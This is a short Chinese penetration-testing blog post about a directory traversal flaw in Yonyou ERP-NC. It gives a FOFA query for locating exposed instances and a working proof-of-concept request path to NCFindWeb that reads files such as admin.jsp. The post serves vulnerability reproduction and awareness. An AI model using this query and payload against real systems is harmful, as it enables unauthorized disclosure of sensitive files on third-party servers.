⽤友ERP-NC ⽬录遍历漏洞

发表于2021-04-29|更新于2022-01-08|渗透测试

|阅读量:

漏洞描述

⽤友ERP-NC 存在⽬录遍历漏洞，攻击者可以通过⽬录遍历获取敏感⽂件信息

fofa语法

app="⽤友-UFIDA-NC"

复现

POC:

/NCFindWeb?service=IPreAlertConfigService&filename=

查看文件（这里以admin.jsp为例）：

文章作者: 剑胆琴心

文章链接: http://www.xpshuai.cn/2021/04/29/%E2%BD%A4%E5%8F%8BERP-NC-%E2%BD%AC%E5%BD%95%E9%81%8D%E5%8E%86%E6%BC%8F%E6%B4%9E/

版权声明: 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自剑胆琴心！

漏洞复现用友ERP-NC

相关推荐

Apache Druid远程代码执行漏洞复现(CVE-2021-25646)

Apache Zeppelin 未授权任意命令执行漏洞

Apache Solr SSRF与任意文件读取漏洞

CVE-2021-21972 vSphere Client RCE复现

CVE-2021-43798（Grafana 未授权任意文件读取漏洞）

Fastjson反序列化

评论

本地搜索